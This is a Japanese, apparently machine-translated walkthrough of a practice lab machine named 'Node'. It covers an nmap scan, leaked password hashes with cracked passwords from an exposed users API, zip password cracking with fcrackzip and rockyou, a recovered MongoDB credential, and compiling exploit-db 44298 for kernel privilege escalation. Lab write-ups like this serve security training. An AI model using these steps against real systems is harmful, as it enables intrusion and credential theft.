目次
メッセージを収集する
root @ kali:〜#nmap -Pn -A -p- 192.168.19.1352020-12-23
でNmap7.70(https://nmap.org)を開始20:22
bogon(192.168.19.135)
ホストのESTNmapスキャンレポートアップしています(0.00063秒の遅延)。
表示されていません:65533フィルターされたポート
ポート状態サービスバージョン
22 / tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2(Ubuntu Linux;プロトコル2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da(RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c(ECDSA)
| _ 256 d8:78:b8:5d:85:ff: ad:7b:e6:e2:b5:da:1e:52:62:36(ED25519)
3000 / tcpオープンhttpNode.jsExpressフレームワーク
| hadoop-datanode-info:
| _ログ:/ login
| hadoop-tasktracker-info:
| _ログ:/ login
| _http-title:MyPlace
MACアドレス:00:0C:29:44:D0:FA(VMware)
警告:少なくとも1つの開いているポートと1つの閉じているポートの
デバイスが見つからなかったため、OSScanの結果が信頼できない可能性がありますタイプ:汎用
実行中:Linux 3.X | 4.X
OS CPE:cpe:/ o:linux:linux_kernel:3 cpe:/ o:linux:linux_kernel:4
OSの詳細:Linux 3.10-4.11 、Linux 3.2-4.9 、 Linux 4.4
ネットワーク距離:1ホップ
サービス情報:OS:Linux; CPE:cpe:/ o:linux:linux_kernel
ページのソースコードを表示
いくつかのjavascriptを見ることができますが、開発者がクライアント側の検証と操作のためにアプリケーションの内部URLをjavascriptで書き込むことがあるので、すべてのjavascriptを手動でチェックして、内部URLを見つけました。
home.js
ビューソース:http://192.168.19.135:3000 / assets / js / app / controllers / home.js
/ api / users / latest
最新
ビューソース:http://192.168.19.135:3000 / api / users / latest
[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
ユーザー名パスワード
トムスポンジボブ
スノーフレークをマークする
言い直し–
トムアカウント
ユーザーディレクトリ
ビューソース:http://192.168.19.135:3000 / api / users /
ユーザー名:myP14ceAdm1nAcc0uNTパスワード:マンチェスター
[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},
{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},
{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},
{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
ログインしてバックアップファイルをダウンロードします
バックアップをダウンロードした後、テキストエディタで開きました。最初は意味がありませんでしたが、ファイル全体を確認したところ、base-64でエンコードされたファイルのようです。下のスクリーンショットで見ることができる完全なファイルをデコードしました。
使用したコマンド:cat myplace.backup base64-d> myplace(myplace.backupファイルをデコードし、デコードしたデータをmyplaceという名前の別のファイルに保存します)
file myplace(ファイルの形式を識別します)
mv myplace myplace.zip(ファイルの名前変更用)
myplace.zipを解凍します(圧縮ファイルの解凍に使用されます)
mv myplace myplace.zip
ブルートフォース圧縮パスワード
使用したコマンド:fcrackzip –dictionary –use-unzip –init-password /usr/share/wordlists/rockyou.txt /tmp/myplace.zip、ブルートフォース攻撃は成功し、圧縮ファイルのパスワードを取得しました。
root @ kali:〜/ Downloads#fcrackzip --dictionary --use-unzip --init-password /usr/share/wordlists/rockyou.txt /root/Downloads/myplace.zip
パスワードが見つかりました!!!!:pw == magicword
ファイルを解凍します
アプリケーションの完全なソースコード!ソースコードでコード分析を実行して、さらに手がかりを得ることができます。最初に、app.jsファイルをチェックして、mongodb接続文字列を見つけました。
mongodb:// mark:5AYRft73VtFpc84k @ localhost:27017 / myplace?authMechanism = DEFAULT&authSource = myplace
カーネルバージョンのエスカレーション
uname -a(カーネルバージョンの識別に使用)cat / etc / issue(オペレーティングシステムのバージョンの識別に使用)
https://www.exploit-db.com/exploits/44298/
root @ kali:〜#gcc 44298.c -o44
ルートを取得するには
